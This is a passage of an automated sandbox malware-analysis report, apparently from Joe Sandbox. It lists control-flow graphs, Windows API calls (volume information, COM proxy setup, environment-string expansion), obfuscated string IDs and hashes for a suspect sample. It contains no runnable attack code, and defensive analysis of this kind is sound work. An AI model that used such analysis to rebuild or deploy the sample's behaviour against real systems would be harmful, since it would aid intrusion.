                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: *,-"$3F&D$_^]\$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$S\]$WQ$L4$L4
                                                                                                                • API String ID: 0-510280711
                                                                                                                • Opcode ID: 59895079e7bc6bd38fccc57970cf513352ee6eb9d059b062de5c9742ee4213ce
                                                                                                                • Instruction ID: 7ae493c22668dc7c83ad0e8142cb9ab2e39a83ef3327a0073fa804b58730e93e
                                                                                                                • Opcode Fuzzy Hash: 59895079e7bc6bd38fccc57970cf513352ee6eb9d059b062de5c9742ee4213ce
                                                                                                                • Instruction Fuzzy Hash: 52C215B56083408FD7248F28D891BABB7E2FF95314F19893DE4C987392D7399811CB5A

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 565 4d1d00-4d1d48 call 4f1320 568 4d1d4e-4d1db8 call 4c4c70 call 4ec540 565->568 569 4d2449-4d2459 565->569 574 4d1dba-4d1dbd 568->574 575 4d1dbf-4d1dd4 574->575 576 4d1dd6-4d1dda 574->576 575->574 577 4d1ddc-4d1de7 576->577 578 4d1dee-4d1e05 577->578 579 4d1de9 577->579 580 4d1e0c-4d1e17 578->580 581 4d1e07-4d1e95 578->581 582 4d1ea8-4d1eab 579->582 584 4d1e19-4d1e89 call 4ee110 580->584 585 4d1e97-4d1e9c 580->585 581->585 586 4d1ead 582->586 587 4d1eaf-4d1eb4 582->587 594 4d1e8e-4d1e93 584->594 589 4d1e9e 585->589 590 4d1ea0-4d1ea3 585->590 586->587 591 4d1eba-4d1eca 587->591 592 4d2392-4d23c7 call 4ec570 587->592 589->582 590->577 595 4d1ecc-4d1ee9 591->595 599 4d23c9-4d23cc 592->599 594->585 597 4d1eef-4d1f13 595->597 598 4d207b-4d2083 595->598 601 4d1f17-4d1f1a 597->601 600 4d2085-4d2088 598->600 604 4d23ce-4d23e3 599->604 605 4d23e5-4d23eb 599->605 606 4d208a-4d208e 600->606 607 4d2090-4d20a1 call 4ec540 600->607 602 4d1f1c-4d1f31 601->602 603 4d1f33-4d1f4d call 4d2460 601->603 602->601 603->598 619 4d1f53-4d1f7c 603->619 604->599 609 4d23ed-4d23f3 605->609 610 4d20b5-4d20b7 606->610 625 4d20b1-4d20b3 607->625 626 4d20a3-4d20ac 607->626 613 4d23f5 609->613 614 4d23f7-4d2409 609->614 616 4d20bd-4d20e0 610->616 617 4d2358-4d2363 610->617 622 4d2447 613->622 623 4d240d-4d2413 614->623 624 4d240b 614->624 618 4d20e2-4d20e5 616->618 620 4d2365-4d2375 617->620 621 4d2367-4d236f 617->621 627 4d211a-4d2157 618->627 628 4d20e7-4d2118 618->628 629 4d1f7e-4d1f81 619->629 631 4d2377 620->631 621->631 622->569 632 4d243b-4d243e 623->632 633 4d2415-4d2437 call 4ee110 623->633 624->632 625->610 634 4d2379-4d237d 626->634 635 4d215b-4d215e 627->635 628->618 636 4d1fae-4d1fc5 call 4d2460 629->636 637 4d1f83-4d1fac 629->637 631->634 640 4d2440 632->640 641 4d2442-4d2445 632->641 633->632 634->595 639 4d2383-4d2388 634->639 642 4d2177-4d217f 635->642 643 4d2160-4d2175 635->643 653 4d1fd4-4d1feb 636->653 654 4d1fc7-4d1fcf 636->654 637->629 649 4d238e-4d2390 639->649 650 4d245a 639->650 640->622 641->609 647 4d2181-4d218c 642->647 643->635 651 4d218e 647->651 652 4d2193-4d21aa 647->652 649->592 656 4d2259-4d2260 651->656 657 4d21ac-4d2246 652->657 658 4d21b1-4d21be 652->658 659 4d1fed 653->659 660 4d1fef-4d2079 call 4b7f50 call 4c48c0 call 4b7f60 653->660 654->600 661 4d2266-4d2289 656->661 662 4d2262 656->662 664 4d2248-4d224d 657->664 658->664 665 4d21c4-4d223a call 4ee110 658->665 659->660 660->600 669 4d228b-4d228e 661->669 662->661 667 4d224f 664->667 668 4d2251-4d2254 664->668 675 4d223f-4d2244 665->675 667->656 668->647 673 4d22ed-4d2301 669->673 674 4d2290-4d22eb 669->674 677 4d2333-4d2336 673->677 678 4d2303-4d2307 673->678 674->669 675->664 680 4d2338-4d2345 call 4ec570 677->680 681 4d2347-4d2349 677->681 679 4d2309-4d2310 678->679 685 4d2320-4d2323 679->685 686 4d2312-4d231e 679->686 684 4d234b-4d234e 680->684 681->684 684->617 689 4d2350-4d2356 684->689 690 4d232b-4d2331 685->690 691 4d2325 685->691 686->679 689->634 690->677 691->690
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: !@$,$8$9$?$Z$\$\$\$]$]$]$^$^$^$_$_$_$d$g$s
                                                                                                                • API String ID: 0-1565257739
                                                                                                                • Opcode ID: 99d4e5286a11582b8e36299fa67380b059a3db8e91883c0b15a05063041609da
                                                                                                                • Instruction ID: 9eb9235d7e6c583b13ae0cd92e266dd3e42b3cd3dca5c289964ddd3913c8ab4e
                                                                                                                • Opcode Fuzzy Hash: 99d4e5286a11582b8e36299fa67380b059a3db8e91883c0b15a05063041609da
                                                                                                                • Instruction Fuzzy Hash: 9C22BE7150C7808FD3248F28C5A136FBBE1AB96314F14496FE9D987392D7B98846CB4B

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 693 4e9280-4e92a4 694 4e92b0-4e92d7 693->694 694->694 695 4e92d9-4e92ef 694->695 696 4e92f0-4e9322 695->696 696->696 697 4e9324-4e936a 696->697 698 4e9370-4e938c 697->698 698->698 699 4e938e-4e93a7 698->699 701 4e93ad-4e93b6 699->701 702 4e942a-4e9435 699->702 704 4e93c0-4e93d9 701->704 703 4e9440-4e947b 702->703 703->703 706 4e947d-4e94de 703->706 704->704 705 4e93db-4e93ee 704->705 707 4e93f0-4e941e 705->707 710 4e9906-4e9932 call 4efe00 GetVolumeInformationW 706->710 711 4e94e4-4e9515 706->711 707->707 708 4e9420-4e9425 707->708 708->702 716 4e993c-4e993e 710->716 717 4e9934-4e9938 710->717 713 4e9520-4e954d 711->713 713->713 715 4e954f-4e9576 SysAllocString 713->715 720 4e957c-4e9596 CoSetProxyBlanket 715->720 721 4e98f5-4e9902 715->721 719 4e9950-4e9957 716->719 717->716 722 4e9959-4e9960 719->722 723 4e9970-4e998f 719->723 726 4e959c-4e95b4 720->726 727 4e98eb-4e98f1 720->727 721->710 722->723 724 4e9962-4e996e 722->724 725 4e9990-4e99b2 723->725 724->723 725->725 728 4e99b4-4e99ca 725->728 730 4e95c0-4e961e 726->730 727->721 732 4e99d0-4e9a06 728->732 730->730 731 4e9620-4e969f 730->731 736 4e96a0-4e96ff 731->736 732->732 733 4e9a08-4e9a2e call 4ce960 732->733 739 4e9a30-4e9a37 733->739 736->736 738 4e9701-4e972d 736->738 748 4e98d6-4e98e7 SysFreeString * 2 738->748 749 4e9733-4e9755 738->749 739->739 740 4e9a39-4e9a4c 739->740 742 4e9a52-4e9a65 call 4b7fd0 740->742 743 4e9940-4e994a 740->743 742->743 743->719 745 4e9a6a-4e9a71 743->745 748->727 751 4e98cc-4e98d2 749->751 752 4e975b-4e975e 749->752 751->748 752->751 753 4e9764-4e9769 752->753 753->751 754 4e976f-4e97b7 753->754 756 4e97c0-4e97d4 754->756 756->756 757 4e97d6-4e97e0 756->757 758 4e97e4-4e97e6 757->758 759 4e97ec-4e97f2 758->759 760 4e98bb-4e98c8 758->760 759->760 761 4e97f8-4e9806 759->761 760->751 762 4e983d 761->762 763 4e9808-4e980d 761->763 765 4e983f-4e9877 call 4b7f50 call 4b8e10 762->765 766 4e981c-4e9820 763->766 777 4e9879-4e988f 765->777 778 4e98a7-4e98b7 call 4b7f60 765->778 768 4e9822-4e982b 766->768 769 4e9810 766->769 772 4e982d-4e9830 768->772 773 4e9832-4e9836 768->773 771 4e9811-4e981a 769->771 771->765 771->766 772->771 773->771 775 4e9838-4e983b 773->775 775->771 777->778 779 4e9891-4e989e 777->779 778->760 779->778 781 4e98a0-4e98a3 779->781 781->778
                                                                                                                APIs
                                                                                                                • SysAllocString.OLEAUT32(00001F7A), ref: 004E9551
                                                                                                                • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004E958F
                                                                                                                • SysFreeString.OLEAUT32 ref: 004E98DF
                                                                                                                • SysFreeString.OLEAUT32(?), ref: 004E98E5
                                                                                                                • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00001F7A,00000000,00000000,00000000,00000000), ref: 004E992E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$Free$AllocBlanketInformationProxyVolume
                                                                                                                • String ID: :;$%$=hn$Jtuj$O^$SB$b{tu$gd$t"j
                                                                                                                • API String ID: 1773362589-1335595022
                                                                                                                • Opcode ID: 5d432d7e539362405aa12dc95573b26e4032a52d14385257d581be5059e71b3c
                                                                                                                • Instruction ID: 8ae3d4c2ec050068229c643935bffa0b348b710d359e851aa28c52f5438e681c
                                                                                                                • Opcode Fuzzy Hash: 5d432d7e539362405aa12dc95573b26e4032a52d14385257d581be5059e71b3c
                                                                                                                • Instruction Fuzzy Hash: ED221276A183419BD310CF25C880B6BBBE2EFC5314F18892DE9D49B3A1D779D845CB86

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 783 4c1227-4c123f 784 4c1241-4c1244 783->784 785 4c1246-4c127e 784->785 786 4c1280-4c12ae call 4b1870 784->786 785->784 789 4c12b0-4c12b3 786->789 790 4c12fd-4c1327 call 4b1870 789->790 791 4c12b5-4c12fb 789->791 794 4c1329-4c1364 call 4c4850 790->794 795 4c132b-4c132f 790->795 791->789 803 4c1368-4c13a9 call 4b7f50 call 4ba8d0 794->803 804 4c1366 794->804 797 4c1d26-4c2744 call 4b1f30 795->797 813 4c13ab-4c13ae 803->813 804->803 814 4c13fa-4c141e call 4b1870 813->814 815 4c13b0-4c13f8 813->815 818 4c1486-4c14b6 call 4c4850 814->818 819 4c1420-4c1459 call 4c4850 814->819 815->813 826 4c14b8 818->826 827 4c14ba-4c155f call 4b7f50 call 4ba8d0 RtlExpandEnvironmentStrings 818->827 824 4c145d-4c1481 call 4b7f50 call 4ba8d0 819->824 825 4c145b 819->825 824->818 825->824 826->827 835 4c1562-4c1565 827->835 836 4c15ff-4c1615 835->836 837 4c156b-4c15fa 835->837 838 4c162d-4c1646 836->838 839 4c1617-4c1628 call 4b7f60 836->839 837->835 841 4c1648 838->841 842 4c164a-4c16ac call 4b7f50 838->842 839->797 841->842 848 4c16ae-4c16d6 call 4b7f60 * 2 842->848 849 4c16db-4c1704 call 4b7f60 842->849 872 4c1d24 848->872 857 4c1706-4c1709 849->857 859 4c173f-4c175a call 4b1870 857->859 860 4c170b-4c173d 857->860 865 4c175c-4c1788 call 4c4850 859->865 866 4c17b6-4c17d7 859->866 860->857 875 4c178c-4c17b4 call 4b7f50 call 4ba8d0 865->875 876 4c178a 865->876 870 4c17da-4c17dd 866->870 873 4c17df-4c1816 870->873 874 4c1818-4c185e call 4b1b80 870->874 872->797 873->870 880 4c1860-4c1863 874->880 875->866 876->875 882 4c18b8-4c18e5 call 4b1a80 880->882 883 4c1865-4c18b6 880->883 888 4c18ec-4c1930 call 4b1f30 882->888 889 4c18e7 882->889 883->880 895 4c1934-4c194d call 4b7f50 888->895 896 4c1932 888->896 890 4c1bf1-4c1c75 call 4b8b60 call 4c57c0 889->890 899 4c1c7a-4c1c89 call 4b9780 890->899 902 4c196f-4c1975 895->902 903 4c194f-4c1956 895->903 896->895 910 4c1c8b-4c1c9a 899->910 911 4c1cc7-4c1cfa call 4b7f60 * 2 899->911 904 4c1977-4c1979 902->904 906 4c1958-4c1964 call 4c4980 903->906 908 4c197b-4c197f 904->908 909 4c1984-4c19c4 call 4b1f40 904->909 917 4c1966-4c196d 906->917 908->890 923 4c19c6-4c19c9 909->923 915 4c1c9c 910->915 916 4c1cb5-4c1cc5 call 4b7f60 910->916 942 4c1cfc-4c1cff call 4b7f60 911->942 943 4c1d04-4c1d0e 911->943 920 4c1c9e-4c1caf call 4c4b10 915->920 916->911 917->902 931 4c1cb1 920->931 932 4c1cb3 920->932 927 4c1a0e-4c1a55 call 4b1870 923->927 928 4c19cb-4c1a0c 923->928 937 4c1a57-4c1a5a 927->937 928->923 931->920 932->916 939 4c1a5c-4c1a77 937->939 940 4c1a79-4c1ac8 call 4b1870 937->940 939->937 948 4c1aca-4c1acd 940->948 942->943 946 4c1d18-4c1d1f call 4b8c40 943->946 947 4c1d10-4c1d13 call 4b7f60 943->947 946->872 947->946 951 4c1acf-4c1af4 948->951 952 4c1af6-4c1b48 call 4b1b80 948->952 951->948 955 4c1b4a-4c1b4d 952->955 956 4c1b7c-4c1bec call 4b1b80 call 4c49a0 955->956 957 4c1b4f-4c1b7a 955->957 956->904 957->955
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: )$+$>$@$F$L$[$`
                                                                                                                • API String ID: 0-4163809010
                                                                                                                • Opcode ID: a48e4d6aea50f48e541117e91ceab89cf8d125c9a6ac44a0720aa66ceb1f945b
                                                                                                                • Instruction ID: c63a471f8f4dfec0341c7e301f8d84929706ca96e0eab14613d8a1d48a411405
                                                                                                                • Opcode Fuzzy Hash: a48e4d6aea50f48e541117e91ceab89cf8d125c9a6ac44a0720aa66ceb1f945b
                                                                                                                • Instruction Fuzzy Hash: 4852C27560C7808BD364DB38C4907AFBBE1ABD6324F194A2EE4D9C7392D6388941CB57

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 962 4e8ea0-4e8ec3 963 4e8ec5-4e8ec8 962->963 964 4e8eca-4e8f2e 963->964 965 4e8f30-4e8f50 963->965 964->963 966 4e8f52-4e8f55 965->966 967 4e8fb6-4e8fba 966->967 968 4e8f57-4e8fb4 966->968 969 4e8fbc-4e8fc7 967->969 968->966 970 4e8fcb-4e8fe4 969->970 971 4e8fc9 969->971 973 4e8fe8-4e8ff3 970->973 974 4e8fe6 970->974 972 4e9036-4e9039 971->972 975 4e903d-4e9042 972->975 976 4e903b 972->976 977 4e9028-4e902d 973->977 978 4e8ff5-4e9023 call 4ee110 973->978 974->977 979 4e9048-4e9068 975->979 980 4e9264-4e9271 975->980 976->975 982 4e902f 977->982 983 4e9031-4e9034 977->983 978->977 984 4e906a-4e906d 979->984 982->972 983->969 986 4e90ce-4e90d2 984->986 987 4e906f-4e90cc 984->987 988 4e90d4-4e90df 986->988 987->984 989 4e90e3-4e90fc 988->989 990 4e90e1 988->990 992 4e90fe 989->992 993 4e9100-4e910b 989->993 991 4e9160-4e9163 990->991 994 4e9167-4e9171 991->994 995 4e9165 991->995 996 4e914f-4e9154 992->996 993->996 997 4e910d-4e9145 call 4ee110 993->997 1000 4e9175-4e917d 994->1000 1001 4e9173 994->1001 995->994 998 4e9158-4e915b 996->998 999 4e9156 996->999 1004 4e914a 997->1004 998->988 999->991 1003 4e9180-4e91a0 1000->1003 1001->1003 1005 4e91a2-4e91a5 1003->1005 1004->996 1006 4e91a7-4e9200 1005->1006 1007 4e9202-4e9206 1005->1007 1006->1005 1008 4e9208-4e920e 1007->1008 1009 4e9212-4e9224 1008->1009 1010 4e9210 1008->1010 1012 4e9228-4e922e 1009->1012 1013 4e9226 1009->1013 1011 4e9262 1010->1011 1011->980 1014 4e9256-4e9259 1012->1014 1015 4e9230-4e9252 call 4ee110 1012->1015 1013->1014 1017 4e925d-4e9260 1014->1017 1018 4e925b 1014->1018 1015->1014 1017->1008 1018->1011
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: \$\$\$]$]$]$^$^$^$_$_$_
                                                                                                                • API String ID: 0-1108506012
                                                                                                                • Opcode ID: 768de620b9939ba22e236952a2237da53f11c4971a0312d18e55c9c86931745a
                                                                                                                • Instruction ID: 80cd5343b44344de70eda90225a08abe5811749fcd69fa4c7433dea7e48956f8
                                                                                                                • Opcode Fuzzy Hash: 768de620b9939ba22e236952a2237da53f11c4971a0312d18e55c9c86931745a
                                                                                                                • Instruction Fuzzy Hash: 41B1F77164C7C08BE3148A69CC8436BBBD257C6325F1D4B6EE5E9873C2C6BD8885874B

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1020 4b8600-4b8611 call 4ed9a0 1023 4b8a48-4b8a4b ExitProcess 1020->1023 1024 4b8617-4b861e call 4e62a0 1020->1024 1027 4b8a31-4b8a38 1024->1027 1028 4b8624-4b864a 1024->1028 1029 4b8a3a-4b8a40 call 4b7f60 1027->1029 1030 4b8a43 call 4ee080 1027->1030 1036 4b864c-4b864e 1028->1036 1037 4b8650-4b887f 1028->1037 1029->1030 1030->1023 1036->1037 1039 4b8880-4b88ce 1037->1039 1039->1039 1040 4b88d0-4b891d call 4ec540 1039->1040 1043 4b8920-4b8943 1040->1043 1044 4b8945-4b8962 1043->1044 1045 4b8964-4b897c 1043->1045 1044->1043 1047 4b8a0d-4b8a25 call 4b9d00 1045->1047 1048 4b8982-4b8a0b 1045->1048 1047->1027 1051 4b8a27 call 4bcb90 1047->1051 1048->1047 1053 4b8a2c call 4bb7b0 1051->1053 1053->1027
                                                                                                                APIs
                                                                                                                • ExitProcess.KERNEL32(00000000), ref: 004B8A4B
                                                                                                                  • Part of subcall function 004BB7B0: FreeLibrary.KERNEL32(004B8A31), ref: 004BB7B6
                                                                                                                  • Part of subcall function 004BB7B0: FreeLibrary.KERNEL32 ref: 004BB7D7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary$ExitProcess
                                                                                                                • String ID: b]u)$}$}
                                                                                                                • API String ID: 1614911148-2900034282
                                                                                                                • Opcode ID: 07e63ec80adbfd8e0f375101bf08e84a4632c36aa94100090e6a31d3ea71ecc4
                                                                                                                • Instruction ID: 626555fd393c8200fba21d44e6fefda013f88d44cfacedcd6a2771fde1e9ce1c
                                                                                                                • Opcode Fuzzy Hash: 07e63ec80adbfd8e0f375101bf08e84a4632c36aa94100090e6a31d3ea71ecc4
                                                                                                                • Instruction Fuzzy Hash: 19C1F573E187144BC708DF69C84125AF7D6ABC8714F0EC52EA898EB395EA74DC058BC6

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
